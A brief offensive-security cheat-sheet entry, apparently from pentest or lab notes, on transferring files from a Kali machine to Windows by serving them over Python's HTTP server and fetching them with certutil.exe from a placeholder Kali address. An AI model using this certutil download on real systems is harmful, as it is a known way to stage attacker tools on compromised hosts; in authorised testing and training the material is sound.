Transferring files from Kali to Windows

On Kali, start a python webserver

python3 -m http.server 80

Then, download the file on windows

certutil.exe -urlcache -f http://<KALI_IP>/file file